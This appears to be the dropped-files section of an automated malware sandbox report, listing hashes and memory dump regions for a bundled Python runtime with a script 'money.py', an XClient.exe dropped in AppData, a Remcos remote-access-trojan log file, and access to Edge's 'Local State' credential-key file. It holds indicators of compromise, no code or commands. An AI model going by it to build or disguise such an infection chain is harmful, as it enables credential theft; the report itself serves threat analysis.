SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\Downloads\Python\Python312\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\Downloads\Python\Python312\money.py

MD5 4522647e7e5989f38a2447eded414c0e
SHA1 3c36233e769420742a23a371a5e65278949a7295
SHA256 846bc3c9676ff8e721189a34fbc31bdc7270d242d3dfe3943565bcecdb6c2519
SHA512 ebf10bb9d09624e99eb9108741a1554cbc4d8fde84a4479d9006b2fc971a6c96c3ed96ec059501f3fb472e51c977bb77571a8ddd51e46df9f70057a3fe5f9155

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

MD5 d42473ce94dd1209f1a2b65e7cc79d8f
SHA1 56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc
SHA256 d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db
SHA512 a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc

MD5 bb08f420f5dfd2344aa42e77cd36669c
SHA1 5e6f66233b1a85bfb8fa1812b8f3b1f63e68151c
SHA256 23440df45b19d66e0d6177162bb06eb02415cdb8b7ff3acc5bf8b17fd463b1f1
SHA512 c2811310838e4ba03211117bb06e8434633365959f9e29888450fcaff1d9de0349b65d91f7e3a6603ce9bcaf79e88f5b48e5c557575fda61e4569c8953c9c34a

C:\Users\Admin\Downloads\Python\Python312\Lib\enum.py

MD5 3a87f9629edad420beb85ab0a1c4482a
SHA1 30c4c3e70e45128c2c83c290e9e5f63bcfa18961
SHA256 9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a
SHA512 e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a

C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\__init__.cpython-312.pyc

MD5 dd2891a001b7a253aec124836d20a4b5
SHA1 91f34a7b0204aae4aacef46bb8ce8add60421d3d
SHA256 e71aac7c0a44cf181682c8887ab2139e5d894f94edde24085a26feecbefb77c9
SHA512 d88dc7450eec5742b9d21f95062cf04ebbf3712d6e20acd4eabafa3cc176d04980f92574a69f32dccbea0454e509660ac4f90e5e49becb54c4c0cd2ee3da2051

C:\Users\Admin\Downloads\Python\Python312\Lib\re\__init__.py

MD5 02f3e3eb14f899eb53a5955e370c839f
SHA1 e5c3ab0720b80a201f86500ccdc61811ab34c741
SHA256 778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42
SHA512 839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\base64.cpython-312.pyc

MD5 6a425637cb61c65ae8cfe0d83e6e3b77
SHA1 d7615d5216ab6d69fbff349bf7e12fe5aa45c741
SHA256 575e9d22cf5e94a7c15044c45bd8f7c03fce5b8b92336651d57ea5e20da188f4
SHA512 84ca7a4f05bc5fbef41fde057dc10a6cc252c4a371b28657085766638a04beacff22c2ac1588d7b077cac6eebe5bfc7c8aadf4ce4f8468282c2a336f7b8d3e27

C:\Users\Admin\Downloads\Python\Python312\Lib\base64.py

MD5 231ae490d92466b1573e541649772154
SHA1 4e47769f5a3239f17af2ce1d9a93c411c195a932
SHA256 9e685425290c771df1a277b5c7787ad5d4cf0312f2c4b042ce44756df6a3d112
SHA512 7084b49f0788bfbe035bc2fe42db7a63b21ebc99f63c03f80dec5569067c1e63312d8c5a754f2d72d7c9bb51fa23ca479fcba78682610eb2b68870cbeae1bea3

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\_endian.cpython-312.pyc

MD5 0fda9dc9c51560c5455ddc99b95dcfe8
SHA1 46794653086d98b8d64eee575e7a04689beea63a
SHA256 4bed1c75e896df05229e609fd827d94a5382e92b158595141b487a70600d5c35
SHA512 7c110f406deafad91d00468d23c38cc0e76a189ded1e8d9491dc3692fbeb5887cad20ee10a0a97b989fdd67529b2fb8b5ad4e183d535dab1d0f1f254503c83c7

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\_endian.py

MD5 7daa213263c75057cf125267b7fdfbd3
SHA1 efb9403d8e3f09734f6b2ba3889b274997d0a039
SHA256 8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579
SHA512 1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\struct.cpython-312.pyc

MD5 29ae69bad548bcb4adc79ed4bd7f073d
SHA1 4ce183af84f7cb3c428ef87d97c03c871417026d
SHA256 038ef897ce5864486e09285946d54c459421b7d10253565c1e2a13857d78b6a9
SHA512 fb90f1ddddadd634af51d8af4d0cd0a8b5011c754d068410bc723c3f6a442f8bdf8105d69f4f77539c5ffb8c446ece7dbcd84a2f40483d3b7f54fe4e76fb3e08

C:\Users\Admin\Downloads\Python\Python312\Lib\struct.py

MD5 5b6fab07ba094054e76c7926315c12db
SHA1 74c5b714160559e571a11ea74feb520b38231bc9
SHA256 eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945
SHA512 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

C:\Users\Admin\Downloads\Python\Python312\DLLs\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\Downloads\Python\Python312\DLLs\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\Downloads\Python\Python312\python3.dll

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\types.cpython-312.pyc

MD5 c5d38a269d5b92e2bfde072a30c45e33
SHA1 23a0d92d7c87656b952439d7c8bba43049bd535e
SHA256 83437236d1d5c63d0e5ab989e104cd3bbce11ea2b3509bded6bac3376a360f5b
SHA512 7ff7179e86f9581d1f71459ca1c6959e0e9cfda2840f26df13f84fab36b823ca10fd5c3966209021348e723269f22afcc69cb089230c86ec5d2d6ae5c10cd505

C:\Users\Admin\Downloads\Python\Python312\Lib\types.py

MD5 8303d9715c8089a5633f874f714643a7
SHA1 cdb53427ca74d3682a666b83f883b832b2c9c9f4
SHA256 d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e
SHA512 1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\__init__.cpython-312.pyc

MD5 e2b942b6814a6d1cad2e720a7b7c1bc6
SHA1 b1af27740ba54ff33ad8a788e0bea405e4053e7b
SHA256 2eb5ccbed547f4cb54bd86d1bbdd8a91bdb9f4d7758b09279ba6bca889ef4d5c
SHA512 5a0248bf8670f28d5c727d33e7d1857c91413a86e3420676c0e35d342252bd638485d25cc7c9e1f42a0cf18330c842f5a5efeb6bc8f1923620b52a99868215c8

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__init__.py

MD5 d0859d693b9465bd1ff48dfe865833a3
SHA1 978c0511ef96d959e0e897d243752bc3a33ba17c
SHA256 bb22c1bd20afd47d33fa6958d8d3e55bea7a1034da8ef2d5f5c0bff1225832c0
SHA512 093026a7978122808554add8c53a2ead737caf125a102b8f66b36e5fd677e4dc31a93025511fcf9d0533ad2491d2753f792b3517b4db0cfe0206e58a6d0e646c

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py

MD5 52084150c6d8fc16c8956388cdbe0868
SHA1 368f060285ea704a9dc552f2fc88f7338e8017f2
SHA256 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519
SHA512 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\utf_8.cpython-312.pyc

MD5 6f9bafab786fdd627c247fbe8e85de01
SHA1 ce99d8bfaa08e52be5dece42c851684458116988
SHA256 a225709104aa9d764c01de396add10bbcfb96a7ae019af69d8de81a683b1f245
SHA512 f53cce6e51e00cb120213810f74016fee82a62be4ed7b5fcdfaefa5f03eaca2e9fc01ad0b7e24860f82d8f2c34fd967e62aeeb04b6a59fe10553c36c96cc79b9

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\utf_8.py

MD5 f932d95afcaea5fdc12e72d25565f948
SHA1 2685d94ba1536b7870b7172c06fe72cf749b4d29
SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
SHA512 a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\aliases.cpython-312.pyc

MD5 1f1314b9020e3c6fe612e34124f9f2b0
SHA1 058c5eb8ff54f49905a5579ccdfccb38de087e97
SHA256 9c262190210f884f24e4d227cb6e4e9706b2909ff4ab18917bb9c86da0ddde26
SHA512 f1db57c6456def9001201e5db14523ab2cd97c6aba200699aff11a6e8d352009f072281fdec93cd764c4083778efeab2e34e1b0240b0938c4e0b10763b21bf76

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\aliases.py

MD5 ff23f6bb45e7b769787b0619b27bc245
SHA1 60172e8c464711cf890bc8a4feccff35aa3de17a
SHA256 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8
SHA512 ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\__init__.cpython-312.pyc

MD5 5793df77b697f1109fe6473952792aca
SHA1 99d036fd2a4e438bfb89c5cf9fab62292d04d924
SHA256 6625882aff1d20e1101d79a6624c16d248a9f5bd0c986296061a1177413c36f3
SHA512 809eb8fc67657cc7e4635c27921fffa1d028424724542ef8272a2028f17259c11310e6e4ddfe8c4b2c795e536a40300ec6d6b282b126de90698716cde944e5ad

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__init__.py

MD5 ea0e0d20c2c06613fd5a23df78109cba
SHA1 b0cb1bedacdb494271ac726caf521ad1c3709257
SHA256 8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74
SHA512 d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3

memory/3852-11560-0x00000273492A0000-0x00000273492AF000-memory.dmp

memory/3852-11562-0x000002734AE20000-0x000002734AE30000-memory.dmp

memory/2732-11564-0x0000022F4EED0000-0x0000022F4EEE0000-memory.dmp

memory/2732-11566-0x0000022F50A60000-0x0000022F50A70000-memory.dmp

memory/4772-11568-0x000001E932440000-0x000001E932452000-memory.dmp

memory/4772-11570-0x000001E933FE0000-0x000001E933FF2000-memory.dmp

memory/2324-11576-0x000002419FEF0000-0x000002419FF07000-memory.dmp

memory/2324-11578-0x00000241A1BB0000-0x00000241A1BC6000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 fb95de2db64beb631e865e2edb7e93e6
SHA1 80d9c8bb7c930b75948d70b46fb99aa8129b65f3
SHA256 a0a21df8603efafa3ee50e318b9fb2790eef1f66a2391b35f754c899e2f1a979
SHA512 ad14dd14921dc589e6bb2447f5967c307e169eafc9e0a91a71124beb8011795a25554418724448696e216a91b6da5b17776667c2f6c10163de5a1c10b80e24a5

memory/3580-11584-0x000001C617E20000-0x000001C617E36000-memory.dmp

memory/3580-11586-0x000001C6199C0000-0x000001C6199D6000-memory.dmp

memory/4928-11588-0x0000029DC7D70000-0x0000029DC7DE4000-memory.dmp

memory/4928-11589-0x0000029DC9A10000-0x0000029DC9A84000-memory.dmp

memory/4928-11591-0x0000029DC9AE0000-0x0000029DC9BBC000-memory.dmp

memory/4928-11601-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11639-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11650-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11648-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11646-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11643-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11637-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11636-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11633-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11631-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11629-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11627-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11625-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11623-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11619-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11617-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11615-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11613-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11611-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11609-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11607-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11605-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11604-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11599-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11597-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11595-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11593-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11592-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11641-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/4928-11621-0x0000029DC9AE0000-0x0000029DC9BB7000-memory.dmp

memory/3440-14945-0x0000017328A80000-0x0000017328A8E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 962061d3e62667a4c08c557104c93f68
SHA1 5b0093cbcd97a17f8d4dcb8788b2fe1649acc86a
SHA256 b66b05be70ca655b4e0e9ef7c9a1b61a97aebeb62e25116151f41c425b10efca
SHA512 992f09ae89df8d018d3b867d37f0da2b414f7f60f570f82774172abd7423ff703c679fc409a638f502084e32de246dc7f5beffdac649e62805204502da3bb3ba

memory/4152-17938-0x0000026A76D30000-0x0000026A76F1C000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 26ee862af49472997e7159e4c02c80a7
SHA1 5d8888350069f55fa3268cf59261c79bec85b56c
SHA256 5af17b6806654ffd9ffa0853de31d9dc96617216e21f226004702f2ffaf4a425
SHA512 51da49201ff92cf75fc65f5c9ec56ea29d38d16fd2db2185e10f3cd7aef3d63472cbd62b61fc8edef9826c901777177919ba6485205733e219e5fbba85b61fd4

C:\Users\Admin\Downloads\Print\Python312\Doc\html\NEWS

MD5 3a2f081757c87fe3f9745f2e857755fa
SHA1 0d49e71b9e0ffaa4f4dc8dcb45a95baa664038e7
SHA256 a15b65d338884ef6b8b99ea300405a293dfec362610e79b8d19755112624210e
SHA512 21f9968546c590d9f8a87333345f6086725905ba2724e5ca5f8f8e1165c20703906fda8e1d0bf59517abe8b166b80f47380e70bb535713a1e7e313b673f21fbd

C:\Users\Admin\Downloads\Print\Python312\Lib\__phello__\__init__.py

MD5 d577c4cfec75304f5f339da0e128db83
SHA1 9542419ca9315d30602f4fe9c9c95d0a2f72bc4f
SHA256 b9ba5f17a049779747dbc8b17fa318fab67875be829994ed437c81d0666a88dc
SHA512 84720ac8d037b6fd51b08f63019f17f1b212069d3bf53c18fecaff4c8fac0c6bce4f73617a7c63fa9a8fd2ba32ba56c11c0a88484aa5e113f33ca768d6ef7bfe

C:\Users\Admin\Downloads\Print\Python312\Lib\concurrent\__init__.py

MD5 f8259102dfc36d919a899cdb8fde48ce
SHA1 4510c766809835dab814c25c2223009eb33e633a
SHA256 52069aeefb58dad898781d8bde183ffda18faae11f17ace8ce83368cab863fb1
SHA512 a77c8a67c95d49e353f903e3bd394e343c0dfa633dcffbfd7c1b34d5e1bdfb9a372ece71360812e44c5c5badfa0fc81387a6f65f96616d6307083c2b3bb0213f

C:\Users\Admin\Downloads\Print\Python312\Lib\lib2to3\fixes\__init__.py

MD5 3d02598f327c3159a8be45fd28daac9b
SHA1 78bd4ccb31f7984b68a96a9f2d0d78c27857b091
SHA256 b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214
SHA512 c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903

C:\Users\Admin\Downloads\Print\Python312\Lib\site-packages\pip-24.0.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\Downloads\Print\Python312\Lib\test\audiotest.au

MD5 2d3d86aedec6b204f70cee1e483d3e14
SHA1 0bb29f5835dbf25b09e98271205a5b0e3b499ac3
SHA256 bb24009573f88b990c922fdc65adddec1312e30373dc635c6099912d4f836a41
SHA512 4981b870b89ab02309d9b5a4acdadd1f145baaacb5f23d0575ba2c62f10bbfe2343c1178456270ad5d9f22f9528e846928d014c14146ec100b8bfeb07cb3f29a

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\4e1295a3.0

MD5 73e784827cc9c81f8ca3fbd372984afd
SHA1 d1553f1e3c103bb429e3af0c2211414fc1d16d4b
SHA256 11772d99be4b8d343c1299eb2f332f0612c290643543708d860bf81c25cfb5c9
SHA512 f8a52854ccdbe535be524aa67a9ba7d793244ba431b2a73cd39b8e5fb925fb09347bdd5333716e44a02e2b814d0f15156992ecc0a1bbb1c89c6e1d5ec18990b3

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\5ed36f99.0

MD5 3fe5f823824bedd9fe3176e58db69fa4
SHA1 807cc9ffa5fe60115bf9df8a086f5cb1199b0a19
SHA256 9c6a82a2d3c4c374fcc2e78d3eda445ebce74d3a7a4d84fc447739df91cb1f0c
SHA512 03f0684a8ad2545add75637562655dfa3c89d06159d607df6e2efac2c446a95bd9cb0437f1c195a75b2e438d7e7812f4f85fbf136e45402947298a1e3fb3506a

C:\Users\Admin\Downloads\Print\Python312\Lib\test\certdata\capath\b1930218.0

MD5 6688a112dc263017affbadeb4b4e4fb4
SHA1 4567ed723977e15d26da815c51046db208c068a0
SHA256 5d35cb81810204013d7fffeb0d01092f9243f994aabfebd017a1d3c217b15693
SHA512 90e5f78f3cd4a0c97331cf66eb4a94115f3cad878eb351d05bc6a8f38dfd8bf18b9a62d5b953d3d4fc36f240db85656e5070bea807967961c365f5ff4ccd6a82

C:\Users\Admin\Downloads\Print\Python312\Lib\test\cjkencodings\cp949-utf8.txt

MD5 4ad57dc71cd0710481e757484c6d1197
SHA1 44cffb5117f62e0697f27f9d2537de3108749df4
SHA256 175e984c0c7bd073f037b0aaa6df4d8aadacb6f1b8898484a567b5e70f5a5837
SHA512 4a2f934f6f907cd2b3c70e3614684460f253e29ce554a418cdc53555feb26252607283d4d5c27221cc8205d002febf4c73b49d5ac0c6b7376e5dade72e9fc9ee

C:\Users\Admin\Downloads\Print\Python312\Lib\test\cjkencodings\euc_jisx0213-utf8.txt

MD5 856e0cebae566258f572e27aedcbf34d
SHA1 9c4e3bafcc4a0c146d4bf21dd126484bb454e789
SHA256 21cb011018b58c87f2c824e08085d24f9379244bcde6fbb6b46da2f6431540c7
SHA512 21e996c6470367d7a74e6cf96b0105ddd93fda0c20fa4053842c3504f582c83688caf04fb64f7fa0e28378d894d29a7b1a39b8bfa7869f710fcc804a6231b3b8

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.bmp

MD5 e3a1f317b1a275e5d5f1b4b0ff04ee01
SHA1 8f37f2c3b3c5b5fd2da41ddcc59ad1b6c29b9bf0
SHA256 410c26b109ce9d32d35c0e4bc6dc92a7579910ce706939a056323de5801a7a87
SHA512 31e83c2bdbd86b038ba0e8ebf02947ddaef002033c760e16ea868c7a673257686d89e328017cbbc8915d31f62fb5149aa0569437525dff8325dd4a8499d718b7

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.exr

MD5 30ffa52a5a358b289c249e1e2d2fa666
SHA1 d07051ed146c1910dbe5d0de8a08d86031390edb
SHA256 abcfa16526dd3d1f31954f88813928de507f4bf2911f30d08ff756d8b46baee5
SHA512 9ffbef0197305e9f1df486af25b743ae0ae5cdc7e198ce8bd45f62e87acbbc4c431fd9944f7dd04103461df392a22c1df43a0e49644adeff2822c1e43b71a43c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.gif

MD5 bb6db723ceadf8ce03d5ad234f9d7273
SHA1 46537a3e2b3764d35e4bff0c951fa87adc17fb83
SHA256 4fce1d82a5a062eaff3ba90478641f671ce5da6f6ba7bdf49029df9eefca2f87
SHA512 bd07b17fb373bea74b9af28e504c6d66c897978e071404e7d04a7bc1a0843e0d7ca5689fc7215e15a9721757889bc75ed920ca72f17810922ae99d62c65c831c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.jpg

MD5 50e9104383c3f36fa9e9be6148e6fdf3
SHA1 9b19331a00f83f12fdc2feba2eb401f9732f8d44
SHA256 0171178ae901e108f56305aff7e36268a690bc49933a24b1aaa587fda00f4d3b
SHA512 c6c940a0e60c1d5c75398592f61da3c874e3bc2b5b7ff328d83de8c8352a4e1e3959954e67049a5c3d6a609af97e39d0e0d16b5a4463328bbc436b8e2926e5d0

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.pbm

MD5 4128214992ffcd16a57fd47c73558b58
SHA1 d8a65c33c1df14930651e1b34b9349b6b179205a
SHA256 7151dc8ebdca81804c959266b14122bf74e62cab773dd8e2f37b379aac105266
SHA512 1c2a56f82742d9f0d8976183ca130454d6e472524a12eb38c4106eaa5bffdb3bf7de3eb31908fea096fb6017c87dd82097bbbd1b17c0ae484ee52a0e192b9590

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.pgm

MD5 18ceaa0a28ec83628b429486f6a6a437
SHA1 1c1c30720dd823863542845395c5a4699a19a060
SHA256 3c27b4cdc7089ddb410ddb81a5ccf42662972e07dfc44fc429d3056af6dd128e
SHA512 1e904378aa240af975fd6ce75b7bf8366105972f257457d317f1ea2e40cab7d1d52ddd95e9d020f50ee5ab298b3b6a0f73f43270155b33ad5bed6d358bac9262

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.png

MD5 91f80d44b0a786e5b0b3049ad61159fa
SHA1 e2fa9ade66052b6c706dec73bae2b44969232ad6
SHA256 480ac039362a15a7738ba76dffe807fd03fa29f7edaa8eb21ca0057c44a1ee8c
SHA512 c73fc0baebc8974e4ad152c81a784aa8ac434d387040c19d75d1cb9e8417e89b6af07b01b88004f9ced6c1feaf8994a04ee926769ee01757932f25b0a834ac30

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.ppm

MD5 a2b32811bb48fbf84e6a4ffa90b6a81c
SHA1 df8515c83469e5f728331f20eb6264953fbc40c7
SHA256 a7f21a2c5226b7d35ccac23780ae535921353b54bf7d7e61f1ad9b021167ba6c
SHA512 a49d7738997b62be088a09cdcf86d9e1fa12dd531c1a880eb519664daf87be581777843a02f15b35d731d1e0f58077ee5630235c71e2a11cebeb337b6528e0a9

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.ras

MD5 8c0f739219341ffae245b5ae0a63710f
SHA1 ee63733bbfac51ed6c2ed2dab2a250faf25f36af
SHA256 10e37c432b4b93a7d257fbb890636fa7f6f376321cca47d5919ea5b6adc75d38
SHA512 5c4db61b091375d87001a600c282285f0e66fcdd4e99c5bbe03a8e7ec0b898abae777454491e7d9f9da5fe9bd56b6e5d5d5e0c8e142f629780fb3a399b3f4add

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.sgi

MD5 11e019f5073be9f31a95f34929fec4e2
SHA1 baa350987e3f3b936db33abc6ddfae0762d4c449
SHA256 58ba5f2c20d320c3f5390ff9778e03d341957bd37c5d3cf0c3327976979f2e01
SHA512 c9b006d3c76358aabf2636f73cdb1d6d56e8f09d4a9817fb80386cd71228e8c93f570f00798870a9ebcc15aae625923c7405fc6827928579f4f44a661e9ef6b7

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.tiff

MD5 d8580e24bfb05ec687436beb33838368
SHA1 99eefffec67780cc34ce21ea7c5b5b3073719011
SHA256 f19a80d1c7d5d758dcea82276e73150454212a5136b19c5fc2727786132ddafd
SHA512 de4c92d0a4f9747b13e9f0c2c1d88e8d8d2151cbe693651e248b72cee43bacf13f0968db9a6d8f2abb2a1c74b4fb5ebc0358651586d4e66da3dc02e63e5afc7c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.webp

MD5 d4d9cee903091f613295efe4b5935689
SHA1 152fb2d413cee0e7c560351c904c2b1a1bb2380a